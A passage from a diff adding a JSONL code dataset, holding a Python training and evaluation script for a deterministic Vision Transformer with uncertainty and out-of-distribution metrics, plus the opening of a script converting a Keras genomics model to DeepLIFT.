diff --git "a/6645.jsonl" "b/6645.jsonl" new file mode 100644--- /dev/null +++ "b/6645.jsonl" @@ -0,0 +1,765 @@ +{"seq_id":"311461948","text":"# coding=utf-8\n# Copyright 2023 The Uncertainty Baselines Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Deterministic ViT.\"\"\"\nimport functools\nimport multiprocessing\nimport os\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nfrom clu import metric_writers\nfrom clu import parameter_overview\nfrom clu import periodic_actions\nfrom clu import preprocess_spec\nimport flax\nimport jax\nimport jax.numpy as jnp\nimport ml_collections.config_flags\nimport numpy as np\nimport robustness_metrics as rm\n\nimport tensorflow as tf\nimport uncertainty_baselines as ub\nimport checkpoint_utils # local file import from baselines.jft\nimport data_uncertainty_utils # local file import from baselines.jft\nimport input_utils # local file import from baselines.jft\nimport ood_utils # local file import from baselines.jft\nimport preprocess_utils # local file import from baselines.jft\nimport subpopl_utils # local file import from baselines.jft\nimport train_utils # local file import from baselines.jft\n\n# TODO(dusenberrymw): Open-source remaining imports.\nfewshot = None\n\nml_collections.config_flags.DEFINE_config_file(\n 'config', None, 'Training configuration.', lock_config=True)\nflags.DEFINE_string('output_dir', default=None, help='Work unit directory.')\nflags.DEFINE_integer(\n 'num_cores', default=None, help='Unused. How many devices being used.')\nflags.DEFINE_boolean(\n 'use_gpu', default=None, help='Unused. Whether or not running on GPU.')\nflags.DEFINE_string('tpu', None,\n 'Unused. Name of the TPU. 
Only used if use_gpu is False.')\n\nFLAGS = flags.FLAGS\n\n\ndef main(config, output_dir):\n\n seed = config.get('seed', 0)\n rng = jax.random.PRNGKey(seed)\n tf.random.set_seed(seed)\n\n if config.get('data_dir'):\n logging.info('data_dir=%s', config.data_dir)\n logging.info('Output dir: %s', output_dir)\n tf.io.gfile.makedirs(output_dir)\n\n save_checkpoint_path = None\n if config.get('checkpoint_steps'):\n save_checkpoint_path = os.path.join(output_dir, 'checkpoint.npz')\n\n # Create an asynchronous multi-metric writer.\n writer = metric_writers.create_default_writer(\n output_dir, just_logging=jax.process_index() > 0)\n\n # The pool is used to perform misc operations such as logging in async way.\n pool = multiprocessing.pool.ThreadPool()\n\n def write_note(note):\n if jax.process_index() == 0:\n logging.info('NOTE: %s', note)\n\n write_note('Initializing...')\n\n # Verify settings to make sure no checkpoints are accidentally missed.\n if config.get('keep_checkpoint_steps'):\n assert config.get('checkpoint_steps'), 'Specify `checkpoint_steps`.'\n assert config.keep_checkpoint_steps % config.checkpoint_steps == 0, (\n f'`keep_checkpoint_steps` ({config.checkpoint_steps}) should be'\n f'divisible by `checkpoint_steps ({config.checkpoint_steps}).`')\n\n batch_size = config.batch_size\n batch_size_eval = config.get('batch_size_eval', batch_size)\n if (batch_size % jax.device_count() != 0 or\n batch_size_eval % jax.device_count() != 0):\n raise ValueError(f'Batch sizes ({batch_size} and {batch_size_eval}) must '\n f'be divisible by device number ({jax.device_count()})')\n\n local_batch_size = batch_size // jax.process_count()\n local_batch_size_eval = batch_size_eval // jax.process_count()\n logging.info(\n 'Global batch size %d on %d hosts results in %d local batch size. 
'\n 'With %d devices per host (%d devices total), that\\'s a %d per-device '\n 'batch size.', batch_size, jax.process_count(), local_batch_size,\n jax.local_device_count(), jax.device_count(),\n local_batch_size // jax.local_device_count())\n\n write_note('Initializing train dataset...')\n rng, train_ds_rng = jax.random.split(rng)\n train_ds_rng = jax.random.fold_in(train_ds_rng, jax.process_index())\n train_ds = input_utils.get_data(\n dataset=config.dataset,\n split=config.train_split,\n rng=train_ds_rng,\n process_batch_size=local_batch_size,\n preprocess_fn=preprocess_spec.parse(\n spec=config.pp_train, available_ops=preprocess_utils.all_ops()),\n shuffle_buffer_size=config.shuffle_buffer_size,\n prefetch_size=config.get('prefetch_to_host', 2),\n data_dir=config.get('data_dir'))\n\n write_note('Initializing val dataset(s)...')\n\n def _get_val_split(dataset, split, pp_eval, data_dir=None):\n # We do ceil rounding such that we include the last incomplete batch.\n nval_img = input_utils.get_num_examples(\n dataset,\n split=split,\n process_batch_size=local_batch_size_eval,\n drop_remainder=False,\n data_dir=data_dir)\n val_steps = int(np.ceil(nval_img / batch_size_eval))\n logging.info('Running validation for %d steps for %s, %s', val_steps,\n dataset, split)\n\n if isinstance(pp_eval, str):\n pp_eval = preprocess_spec.parse(\n spec=pp_eval, available_ops=preprocess_utils.all_ops())\n\n val_ds = input_utils.get_data(\n dataset=dataset,\n split=split,\n rng=None,\n process_batch_size=local_batch_size_eval,\n preprocess_fn=pp_eval,\n cache=config.get('val_cache', 'batched'),\n num_epochs=1,\n repeat_after_batching=True,\n shuffle=False,\n prefetch_size=config.get('prefetch_to_host', 2),\n drop_remainder=False,\n data_dir=data_dir)\n\n return val_ds\n\n val_ds_splits = {\n 'val':\n _get_val_split(\n config.dataset,\n split=config.val_split,\n pp_eval=config.pp_eval,\n data_dir=config.get('data_dir'))\n }\n\n if config.get('test_split'):\n val_ds_splits.update({\n 'test':\n _get_val_split(\n config.dataset,\n split=config.test_split,\n pp_eval=config.pp_eval,\n data_dir=config.get('data_dir'))\n })\n\n if config.get('subpopl_cifar_data_file'):\n dataset_builder = input_utils.cifar_from_sql(\n sql_database=config.subpopl_cifar_data_file,\n num_classes=config.num_classes)\n\n subpopl_val_ds_splits = { # pylint: disable=g-complex-comprehension\n client_id: _get_val_split(\n dataset_builder,\n split=client_id,\n pp_eval=config.pp_eval_subpopl_cifar,\n data_dir=config.subpopl_cifar_data_file)\n for client_id in dataset_builder.client_ids\n }\n\n if config.get('eval_on_cifar_10h'):\n cifar10_to_cifar10h_fn = data_uncertainty_utils.create_cifar10_to_cifar10h_fn(\n config.get('data_dir', None))\n preprocess_fn = preprocess_spec.parse(\n spec=config.pp_eval_cifar_10h, available_ops=preprocess_utils.all_ops())\n pp_eval = lambda ex: preprocess_fn(cifar10_to_cifar10h_fn(ex))\n val_ds_splits['cifar_10h'] = _get_val_split(\n 'cifar10',\n split=config.get('cifar_10h_split') or 'test',\n pp_eval=pp_eval,\n data_dir=config.get('data_dir'))\n elif config.get('eval_on_imagenet_real'):\n imagenet_to_real_fn = data_uncertainty_utils.create_imagenet_to_real_fn()\n preprocess_fn = preprocess_spec.parse(\n spec=config.pp_eval_imagenet_real,\n available_ops=preprocess_utils.all_ops())\n pp_eval = lambda ex: preprocess_fn(imagenet_to_real_fn(ex)) # pytype: disable=wrong-arg-types\n val_ds_splits['imagenet_real'] = _get_val_split(\n 'imagenet2012_real',\n split=config.get('imagenet_real_split') or 'validation',\n 
pp_eval=pp_eval,\n data_dir=config.get('data_dir'))\n\n ood_ds = {}\n if config.get('ood_datasets') and config.get('ood_methods'):\n if config.get('ood_methods'): # config.ood_methods is not a empty list\n logging.info('loading OOD dataset = %s', config.get('ood_datasets'))\n ood_ds, ood_ds_names = ood_utils.load_ood_datasets(\n config.dataset,\n config.ood_datasets,\n config.ood_split,\n config.pp_eval,\n config.pp_eval_ood,\n config.ood_methods,\n config.train_split,\n config.get('data_dir'),\n _get_val_split,\n )\n\n ntrain_img = input_utils.get_num_examples(\n config.dataset,\n split=config.train_split,\n process_batch_size=local_batch_size,\n data_dir=config.get('data_dir'))\n steps_per_epoch = ntrain_img // batch_size\n\n if config.get('num_epochs'):\n total_steps = int(config.num_epochs * steps_per_epoch)\n assert not config.get('total_steps'), 'Set either num_epochs or total_steps'\n else:\n total_steps = config.total_steps\n\n logging.info('Total train data points: %d', ntrain_img)\n logging.info(\n 'Running for %d steps, that means %f epochs and %d steps per epoch',\n total_steps, total_steps * batch_size / ntrain_img, steps_per_epoch)\n\n write_note('Initializing model...')\n logging.info('config.model = %s', config.model)\n model = ub.models.vision_transformer(\n num_classes=config.num_classes, **config.model)\n\n # We want all parameters to be created in host RAM, not on any device, they'll\n # be sent there later as needed, otherwise we already encountered two\n # situations where we allocate them twice.\n @functools.partial(jax.jit, backend='cpu')\n def init(rng):\n image_size = tuple(train_ds.element_spec['image'].shape[2:])\n logging.info('image_size = %s', image_size)\n dummy_input = jnp.zeros((local_batch_size,) + image_size, jnp.float32)\n params = flax.core.unfreeze(model.init(rng, dummy_input,\n train=False))['params']\n\n # Set bias in the head to a low value, such that loss is small initially.\n params['head']['bias'] = jnp.full_like(params['head']['bias'],\n config.get('init_head_bias', 0))\n\n # init head kernel to all zeros for fine-tuning\n if config.get('model_init'):\n params['head']['kernel'] = jnp.full_like(params['head']['kernel'], 0)\n\n return params\n\n rng, rng_init = jax.random.split(rng)\n params_cpu = init(rng_init)\n\n if jax.process_index() == 0:\n num_params = sum(p.size for p in jax.tree_flatten(params_cpu)[0])\n parameter_overview.log_parameter_overview(params_cpu)\n writer.write_scalars(step=0, scalars={'num_params': num_params})\n\n @functools.partial(jax.pmap, axis_name='batch')\n def evaluation_fn(params, images, labels, mask):\n \"\"\"Copy to deterministic_utils.py whenever changes are made!\"\"\"\n # Ignore the entries with all zero labels for evaluation.\n mask *= (labels.max(axis=1) > 0).astype(labels.dtype)\n logits, out = model.apply({'params': flax.core.freeze(params)},\n images,\n train=False)\n label_indices = config.get('label_indices')\n logging.info('!!! mask %s, label_indices %s', mask, label_indices)\n if label_indices:\n logits = logits[:, label_indices]\n\n # Note that logits and labels are usually of the shape [batch,num_classes].\n # But for OOD data, when num_classes_ood > num_classes_ind, we need to\n # adjust labels to labels[:, :config.num_classes] to match the shape of\n # logits. That is just to avoid shape mismatch. 
The output losses does not\n # have any meaning for OOD data, because OOD not belong to any IND class.\n losses = getattr(train_utils, config.get('loss', 'sigmoid_xent'))(\n logits=logits,\n labels=labels[:, :(len(label_indices) if label_indices\n else config.num_classes)], reduction=False)\n loss = jax.lax.psum(losses * mask, axis_name='batch')\n\n top1_idx = jnp.argmax(logits, axis=1)\n # Extracts the label at the highest logit index for each image.\n top1_correct = jnp.take_along_axis(labels, top1_idx[:, None], axis=1)[:, 0]\n ncorrect = jax.lax.psum(top1_correct * mask, axis_name='batch')\n n = jax.lax.psum(mask, axis_name='batch')\n\n metric_args = jax.lax.all_gather([logits, labels, out['pre_logits'], mask],\n axis_name='batch')\n return ncorrect, loss, n, metric_args\n\n @functools.partial(jax.pmap, axis_name='batch')\n def cifar_10h_evaluation_fn(params, images, labels, mask):\n logits, out = model.apply({'params': flax.core.freeze(params)},\n images,\n train=False)\n label_indices = config.get('label_indices')\n if label_indices:\n logits = logits[:, label_indices]\n\n losses = getattr(train_utils, config.get('loss', 'softmax_xent'))(\n logits=logits, labels=labels, reduction=False)\n loss = jax.lax.psum(losses, axis_name='batch')\n\n top1_idx = jnp.argmax(logits, axis=1)\n # Extracts the label at the highest logit index for each image.\n one_hot_labels = jnp.eye(10)[jnp.argmax(labels, axis=1)]\n\n top1_correct = jnp.take_along_axis(\n one_hot_labels, top1_idx[:, None], axis=1)[:, 0]\n ncorrect = jax.lax.psum(top1_correct, axis_name='batch')\n n = jax.lax.psum(one_hot_labels, axis_name='batch')\n\n metric_args = jax.lax.all_gather([logits, labels, out['pre_logits'], mask],\n axis_name='batch')\n return ncorrect, loss, n, metric_args\n\n # Setup function for computing representation.\n @functools.partial(jax.pmap, axis_name='batch')\n def representation_fn(params, images, labels, mask):\n _, outputs = model.apply({'params': flax.core.freeze(params)},\n images,\n train=False)\n representation = outputs[config.fewshot.representation_layer]\n representation = jax.lax.all_gather(representation, 'batch')\n labels = jax.lax.all_gather(labels, 'batch')\n mask = jax.lax.all_gather(mask, 'batch')\n return representation, labels, mask\n\n # Load the optimizer from flax.\n opt_name = config.get('optim_name')\n write_note(f'Initializing {opt_name} optimizer...')\n opt_def = getattr(flax.optim, opt_name)(**config.get('optim', {}))\n\n # We jit this, such that the arrays that are created are created on the same\n # device as the input is, in this case the CPU. Else they'd be on device[0].\n opt_cpu = jax.jit(opt_def.create)(params_cpu)\n\n weight_decay_rules = config.get('weight_decay', []) or []\n rescale_value = 1.\n weight_decay_fn = train_utils.get_weight_decay_fn(\n weight_decay_rules=weight_decay_rules, rescale_value=rescale_value)\n\n @functools.partial(jax.pmap, axis_name='batch', donate_argnums=(0,))\n def update_fn(opt, lr, images, labels, rng):\n \"\"\"Update step. 
Copy to deterministic_utils.py whenever changes are made!\"\"\"\n measurements = {}\n\n # Split rng and return next_rng for the following step.\n rng, next_rng = jax.random.split(rng, 2)\n rng_local = jax.random.fold_in(rng, jax.lax.axis_index('batch'))\n\n def loss_fn(params, images, labels):\n logits, _ = model.apply(\n {'params': flax.core.freeze(params)}, images,\n train=True, rngs={'dropout': rng_local})\n label_indices = config.get('label_indices')\n if label_indices:\n logits = logits[:, label_indices]\n loss = getattr(train_utils, config.get('loss', 'sigmoid_xent'))(\n logits=logits, labels=labels)\n return loss, logits\n # Implementation considerations compared and summarized at\n # https://docs.google.com/document/d/1g3kMEvqu1DOawaflKNyUsIoQ4yIVEoyE5ZlIPkIl4Lc/edit?hl=en#\n (l, logits), g = train_utils.accumulate_gradient(\n jax.value_and_grad(loss_fn, has_aux=True), opt.target, images, labels,\n config.get('grad_accum_steps'))\n l, g = jax.lax.pmean((l, g), axis_name='batch')\n measurements['training_loss'] = l\n\n # Log the gradient norm only if we need to compute it anyways (clipping)\n # or if we don't use grad_accum_steps, as they interact badly.\n if config.get('grad_accum_steps', 1) == 1 or config.get('grad_clip_norm'):\n grads, _ = jax.tree_flatten(g)\n l2_g = jnp.sqrt(sum([jnp.vdot(p, p) for p in grads]))\n measurements['l2_grads'] = l2_g\n\n # Optionally resize the global gradient to a maximum norm. We found this\n # useful in some cases across optimizers, hence it's in the main loop.\n if config.get('grad_clip_norm'):\n g_factor = jnp.minimum(1.0, config.grad_clip_norm / l2_g)\n g = jax.tree_util.tree_map(lambda p: g_factor * p, g)\n opt = opt.apply_gradient(g, learning_rate=lr)\n\n opt = opt.replace(target=weight_decay_fn(opt.target, lr))\n\n params, _ = jax.tree_flatten(opt.target)\n measurements['l2_params'] = jnp.sqrt(sum([jnp.vdot(p, p) for p in params]))\n\n top1_idx = jnp.argmax(logits, axis=1)\n top1_correct = jnp.take_along_axis(labels, top1_idx[:, None], axis=1)[:, 0]\n prec1 = jax.lax.psum(jnp.sum(top1_correct), axis_name='batch') / batch_size\n measurements['training_prec@1'] = prec1\n measurements['learning_rate'] = lr\n return opt, next_rng, measurements\n\n reint_params = ('head/kernel', 'head/bias')\n if config.get('only_eval', False) or not config.get('reint_head', True):\n reint_params = []\n checkpoint_data = checkpoint_utils.maybe_load_checkpoint(\n train_loop_rngs=rng,\n save_checkpoint_path=save_checkpoint_path,\n init_optimizer=opt_cpu,\n init_params=params_cpu,\n init_fixed_model_states=None,\n default_reinit_params=reint_params,\n config=config)\n train_loop_rngs = checkpoint_data.train_loop_rngs\n opt_cpu = checkpoint_data.optimizer\n accumulated_train_time = checkpoint_data.accumulated_train_time\n\n write_note('Kicking off misc stuff...')\n first_step = int(opt_cpu.state.step) # Might be a DeviceArray type.\n logging.info('first_step = %s', first_step)\n if first_step == 0 and jax.process_index() == 0:\n writer.write_hparams(dict(config))\n\n chrono = train_utils.Chrono(\n first_step, total_steps, batch_size, accumulated_train_time)\n\n # Note: switch to ProfileAllHosts() if you need to profile all hosts.\n # (Xprof data become much larger and take longer to load for analysis)\n profiler = periodic_actions.Profile(\n # Create profile after every restart to analyze pre-emption related\n # problems and assure we get similar performance in every run.\n logdir=output_dir, first_profile=first_step + 10)\n\n # TODO(dusenberrymw): Remove manual 
replication by updating pmap axes.\n write_note(f'Replicating...\\n{chrono.note}')\n opt_repl = flax.jax_utils.replicate(opt_cpu)\n\n write_note(f'Initializing few-shotters...\\n{chrono.note}')\n fewshotter = None\n if 'fewshot' in config and fewshot is not None:\n fewshotter = fewshot.FewShotEvaluator(\n representation_fn, config.fewshot,\n config.fewshot.get('batch_size') or batch_size_eval)\n\n checkpoint_writer = None\n\n lr_fn = train_utils.create_learning_rate_schedule(total_steps,\n **config.get('lr', {}))\n\n # Prefetch all iterators, starting at the current first step.\n if first_step > 0:\n write_note('Advancing the dataset after resuming from a checkpoint...')\n # TODO(dusenberrymw): Look into checkpointing dataset state instead.\n train_ds = train_ds.skip(first_step)\n\n # TODO(dusenberrymw): According to flax docs, prefetching shouldn't be\n # necessary for TPUs.\n train_iter = input_utils.start_input_pipeline(\n train_ds, config.get('prefetch_to_device', 1))\n lr_iter = train_utils.prefetch_scalar(\n map(lr_fn, range(first_step, total_steps)),\n config.get('prefetch_to_device', 1))\n\n # Note: we return the train loss, val loss, and fewshot best l2s for use in\n # reproducibility unit tests.\n train_loss = -jnp.inf\n val_loss = {val_name: -jnp.inf for val_name, _ in val_ds_splits.items()}\n fewshot_results = {'dummy': {(0, 1): -jnp.inf}}\n\n write_note(f'First step compilations...\\n{chrono.note}')\n for step in range(first_step + 1, total_steps + 1):\n with jax.profiler.StepTraceAnnotation('train_step', step_num=step):\n train_batch = next(train_iter)\n lr_repl = next(lr_iter)\n if not config.get('only_eval', False):\n opt_repl, train_loop_rngs, extra_measurements = update_fn(\n opt_repl,\n lr_repl,\n train_batch['image'],\n train_batch['labels'],\n rng=train_loop_rngs)\n\n if jax.process_index() == 0:\n profiler(step)\n\n # Checkpoint saving.\n if not config.get('only_eval', False) and train_utils.itstime(\n step, config.get('checkpoint_steps'), total_steps, process=0):\n write_note('Checkpointing...')\n chrono.pause()\n train_utils.checkpointing_timeout(checkpoint_writer,\n config.get('checkpoint_timeout', 1))\n accumulated_train_time = chrono.accum_train_time\n # We need to transfer the weights over now or else we risk keeping them\n # alive while they'll be updated in a future step, creating hard to debug\n # memory errors (see b/160593526). Also, takes device 0's params only.\n opt_cpu = jax.tree_util.tree_map(lambda x: np.array(x[0]), opt_repl)\n\n # Check whether we want to keep a copy of the current checkpoint.\n copy_step = None\n if train_utils.itstime(step, config.get('keep_checkpoint_steps'),\n total_steps):\n write_note('Keeping a checkpoint copy...')\n copy_step = step\n\n # Checkpoint should be a nested dictionary or FLAX datataclasses from\n # `flax.struct`. 
Both can be present in a checkpoint.\n checkpoint_data = checkpoint_utils.CheckpointData(\n train_loop_rngs=train_loop_rngs,\n optimizer=opt_cpu,\n accumulated_train_time=accumulated_train_time)\n\n checkpoint_writer = pool.apply_async(\n checkpoint_utils.checkpoint_trained_model,\n (checkpoint_data, save_checkpoint_path, copy_step))\n chrono.resume()\n\n # Report training progress.\n if not config.get('only_eval', False) and train_utils.itstime(\n step, config.log_training_steps, total_steps, process=0):\n write_note('Reporting training progress...')\n timing_measurements, note = chrono.tick(step)\n write_note(note)\n train_measurements = {}\n train_measurements.update(flax.jax_utils.unreplicate(extra_measurements))\n train_measurements.update(timing_measurements)\n writer.write_scalars(step, train_measurements)\n # Keep train_loss to return for reproducibility tests.\n train_loss = train_measurements['training_loss']\n\n # Report validation performance.\n if config.get('only_eval', False) or train_utils.itstime(\n step, config.log_eval_steps, total_steps):\n write_note('Evaluating on the validation set...')\n chrono.pause()\n for val_name, val_ds in val_ds_splits.items():\n # Sets up evaluation metrics.\n ece_num_bins = config.get('ece_num_bins', 15)\n auc_num_bins = config.get('auc_num_bins', 1000)\n ece = rm.metrics.ExpectedCalibrationError(num_bins=ece_num_bins)\n calib_auc = rm.metrics.CalibrationAUC(correct_pred_as_pos_label=False)\n oc_auc_0_5 = rm.metrics.OracleCollaborativeAUC(oracle_fraction=0.005,\n num_bins=auc_num_bins)\n oc_auc_1 = rm.metrics.OracleCollaborativeAUC(oracle_fraction=0.01,\n num_bins=auc_num_bins)\n oc_auc_2 = rm.metrics.OracleCollaborativeAUC(oracle_fraction=0.02,\n num_bins=auc_num_bins)\n oc_auc_5 = rm.metrics.OracleCollaborativeAUC(oracle_fraction=0.05,\n num_bins=auc_num_bins)\n label_diversity = tf.keras.metrics.Mean()\n sample_diversity = tf.keras.metrics.Mean()\n ged = tf.keras.metrics.Mean()\n\n # Runs evaluation loop.\n val_iter = input_utils.start_input_pipeline(\n val_ds, config.get('prefetch_to_device', 1))\n ncorrect, loss, nseen = 0, 0, 0\n for batch in val_iter:\n if val_name == 'cifar_10h':\n batch_ncorrect, batch_losses, batch_n, batch_metric_args = (\n cifar_10h_evaluation_fn(opt_repl.target, batch['image'],\n batch['labels'], batch['mask']))\n else:\n batch_ncorrect, batch_losses, batch_n, batch_metric_args = (\n evaluation_fn(opt_repl.target, batch['image'],\n batch['labels'], batch['mask']))\n # All results are a replicated array shaped as follows:\n # (local_devices, per_device_batch_size, elem_shape...)\n # with each local device's entry being identical as they got psum'd.\n # So let's just take the first one to the host as numpy.\n ncorrect += np.sum(np.array(batch_ncorrect[0]))\n loss += np.sum(np.array(batch_losses[0]))\n nseen += np.sum(np.array(batch_n[0]))\n if config.get('loss', 'sigmoid_xent') != 'sigmoid_xent':\n # Here we parse batch_metric_args to compute uncertainty metrics.\n # (e.g., ECE or Calibration AUC).\n logits, labels, _, masks = batch_metric_args\n masks = np.array(masks[0], dtype=bool)\n logits = np.array(logits[0])\n probs = jax.nn.softmax(logits)\n # From one-hot to integer labels, as required by ECE.\n int_labels = np.argmax(np.array(labels[0]), axis=-1)\n int_preds = np.argmax(logits, axis=-1)\n confidence = np.max(probs, axis=-1)\n for p, c, l, d, m, label in zip(probs, confidence, int_labels,\n int_preds, masks, labels[0]):\n ece.add_batch(p[m, :], label=l[m])\n calib_auc.add_batch(d[m], label=l[m], 
confidence=c[m])\n # TODO(jereliu): Extend to support soft multi-class probabilities.\n oc_auc_0_5.add_batch(d[m], label=l[m], custom_binning_score=c[m])\n oc_auc_1.add_batch(d[m], label=l[m], custom_binning_score=c[m])\n oc_auc_2.add_batch(d[m], label=l[m], custom_binning_score=c[m])\n oc_auc_5.add_batch(d[m], label=l[m], custom_binning_score=c[m])\n\n if val_name == 'cifar_10h' or val_name == 'imagenet_real':\n num_classes = config.num_classes\n if config.get('label_indices'):\n num_classes = len(config.get('label_indices'))\n batch_label_diversity, batch_sample_diversity, batch_ged = data_uncertainty_utils.generalized_energy_distance(\n label[m], p[m, :], num_classes)\n label_diversity.update_state(batch_label_diversity)\n sample_diversity.update_state(batch_sample_diversity)\n ged.update_state(batch_ged)\n\n val_loss[val_name] = loss / nseen # Keep for reproducibility tests.\n val_measurements = {\n f'{val_name}_prec@1': ncorrect / nseen,\n f'{val_name}_loss': val_loss[val_name],\n }\n if config.get('loss', 'sigmoid_xent') != 'sigmoid_xent':\n val_measurements[f'{val_name}_ece'] = ece.result()['ece']\n val_measurements[f'{val_name}_calib_auc'] = calib_auc.result()[\n 'calibration_auc']\n val_measurements[f'{val_name}_oc_auc_0.5%'] = oc_auc_0_5.result()[\n 'collaborative_auc']\n val_measurements[f'{val_name}_oc_auc_1%'] = oc_auc_1.result()[\n 'collaborative_auc']\n val_measurements[f'{val_name}_oc_auc_2%'] = oc_auc_2.result()[\n 'collaborative_auc']\n val_measurements[f'{val_name}_oc_auc_5%'] = oc_auc_5.result()[\n 'collaborative_auc']\n writer.write_scalars(step, val_measurements)\n\n if val_name == 'cifar_10h' or val_name == 'imagenet_real':\n cifar_10h_measurements = {\n f'{val_name}_label_diversity': label_diversity.result(),\n f'{val_name}_sample_diversity': sample_diversity.result(),\n f'{val_name}_ged': ged.result(),\n }\n writer.write_scalars(step, cifar_10h_measurements)\n\n # OOD evaluation.\n # Entries in the ood_ds dict include:\n # (ind_dataset, ood_dataset1, ood_dataset2, ...).\n # OOD metrics are computed using ind_dataset paired with each of the\n # ood_dataset. 
When Mahalanobis distance method is applied, train_ind_ds\n # is also included in the ood_ds.\n if ood_ds and config.ood_methods:\n ood_measurements = ood_utils.eval_ood_metrics(\n ood_ds,\n ood_ds_names,\n config.ood_methods,\n evaluation_fn,\n opt_repl.target,\n n_prefetch=config.get('prefetch_to_device', 1))\n writer.write_scalars(step, ood_measurements)\n chrono.resume()\n\n # Perform subpopulation shift evaluation only if flag is provided.\n if config.get('subpopl_cifar_data_file'):\n subpopl_measurements = subpopl_utils.eval_subpopl_metrics(\n subpopl_val_ds_splits,\n evaluation_fn,\n opt_repl.target,\n n_prefetch=config.get('prefetch_to_device', 1))\n writer.write_scalars(step, scalars=subpopl_measurements)\n\n if 'fewshot' in config and fewshotter is not None:\n # Compute few-shot on-the-fly evaluation.\n if config.get('only_eval', False) or train_utils.itstime(\n step, config.fewshot.log_steps, total_steps):\n chrono.pause()\n write_note(f'Few-shot evaluation...\\n{chrono.note}')\n # Keep `results` to return for reproducibility tests.\n fewshot_results, best_l2 = fewshotter.run_all(opt_repl.target,\n config.fewshot.datasets)\n\n # TODO(dusenberrymw): Remove this once fewshot.py is updated.\n def make_writer_measure_fn(step):\n\n def writer_measure(name, value):\n writer.write_scalars(step, {name: value})\n\n return writer_measure\n\n fewshotter.walk_results(\n make_writer_measure_fn(step), fewshot_results, best_l2)\n chrono.resume()\n\n if config.get('only_eval', False):\n break\n elif config.get('testing_failure_step'):\n # Break early to simulate infra failures in test cases.\n if config.testing_failure_step == step:\n break\n\n write_note(f'Done!\\n{chrono.note}')\n pool.close()\n pool.join()\n writer.close()\n\n # Return final training loss, validation loss, and fewshot results for\n # reproducibility test cases.\n return train_loss, val_loss, fewshot_results\n\n\nif __name__ == '__main__':\n # Adds jax flags to the program.\n jax.config.config_with_absl()\n\n # TODO(dusenberrymw): Refactor `main` such that there is a `train_eval`\n # function that returns values for tests and does not directly access flags,\n # and then have `main` return None.\n\n def _main(argv):\n del argv\n config = FLAGS.config\n output_dir = FLAGS.output_dir\n main(config, output_dir)\n\n app.run(_main) # Ignore the returned values from `main`.\n","sub_path":"baselines/jft/deterministic.py","file_name":"deterministic.py","file_ext":"py","file_size_in_byte":31303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"183790414","text":"'''\nConverts our tensorflow/keras model to a deeplift model\nAuthors: Anna G. Green\n Chang Ho Yoon\n\nNote: This requires tensorflow v1!! 
The CNN model must be saved in tf1\n\nBased on Google Colab notebook DeepLIFT notebook genomics tutorial.ipynb\n'''\nfrom __future__ import print_function\nimport sparse\nimport os\nimport sys\nimport warnings\nimport h5py\nprint(\"h5py version:\", h5py.__version__)\nimport json\nimport deeplift\nwarnings.filterwarnings(\"ignore\")\n\nimport tensorflow as tf\nprint(\"Tensorflow version:\", tf.__version__)\nfrom tensorflow import keras\nprint(\"Keras version:\", keras.__version__)\nimport numpy as np\nprint(\"Numpy version:\", np.__version__)\nimport tensorflow.keras.backend as K\nimport pandas as pd\nimport deeplift.conversion.kerasapi_conversion as kc\n\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras import models\nfrom sklearn.metrics import roc_auc_score, average_precision_score\n\nfrom tensorflow.keras.models import model_from_json\nfrom deeplift.layers import NonlinearMxtsMode\nfrom collections import OrderedDict\nfrom deeplift.util import compile_func\n\n####### Section 1: Read in the reference input data and convert to one-hot #########\n\ndef _get_shapes(df_geno):\n\t\t\"\"\"\n\t\tFinds the length of each gene in the input dataframe\n\t\tParameters\n\t\t----------\n\t\tdf_geno_pheno: pd.Dataframe\n\n\t\tReturns\n\t\t-------\n\t\tdict of str: int\n\t\t\tlength of coordinates in each column\n\t\t\"\"\"\n\t\tshapes = {}\n\t\tfor column in df_geno.columns:\n\t\t\tif \"one_hot\" in column:\n\t\t\t\tshapes[column] = df_geno.loc[df_geno.index[0],column].shape[0]\n\n\t\treturn shapes\n\nh37rv_geno = pd.read_pickle(\"../model_training/h37rv_geno.pkl\")\n\nshapes = _get_shapes(h37rv_geno)\nn_genes = len(shapes)\nL_longest = max(list(shapes.values()))\nprint(\"found n genes\", n_genes, \"and longest gene\", L_longest)\n\n# Initialize X to hold H37rv sequence in one hot encoding\nX = np.zeros((1, 4, L_longest, n_genes))\n\n# for each gene locus\nfor gene_index, gene in enumerate(shapes.keys()):\n one_hot_gene = h37rv_geno.loc[:, gene][0]\n # remove column of gaps/'missing' nucleotides as per DeepLift implementation\n one_hot_gene = one_hot_gene[:, :4]\n # rearrange axes to fit X\n one_hot_gene_arr = np.moveaxis(one_hot_gene, source = [0], destination = [1])\n X[:, :, range(0, one_hot_gene.shape[0]), gene_index] = one_hot_gene_arr\n\nX_h37rv = X\n\n####### Section 2: Prepare the model and save in json format ########\n# We must convert the keras model to a deeplift model\n# Deeplift model saved as a json file to be loaded in the future\n\ndef masked_multi_weighted_bce(alpha, y_pred):\n\n\t\"\"\"\n\tCalculates the masked weighted binary cross-entropy in multi-classification\n\n\tParameters\n\t----------\n\talpha: an element from the alpha matrix, a matrix of target y values weighted\n\t\tby proportion of strains with resistance data for any given drug\n\ty_pred: model-predicted y values\n\n\tReturns\n\t-------\n\tscalar value of the masked weighted BCE.\n\t\"\"\"\n\ty_pred = K.clip(y_pred, K.epsilon(), 1.0 - K.epsilon())\n\ty_true_ = K.cast(K.greater(alpha, 0.), K.floatx())\n\tmask = K.cast(K.not_equal(alpha, 0.), K.floatx())\n\tnum_not_missing = K.sum(mask, axis=-1)\n\talpha = K.abs(alpha)\n\tbce = - alpha * y_true_ * K.log(y_pred) - (1.0 - alpha) * (1.0 - y_true_) * K.log(1.0 - y_pred)\n\tmasked_bce = bce * mask\n\treturn K.sum(masked_bce, axis=-1) / num_not_missing\n\ndef masked_weighted_accuracy(alpha, y_pred):\n\n\t\"\"\"\n\tCalculates the mased weighted accuracy of a 
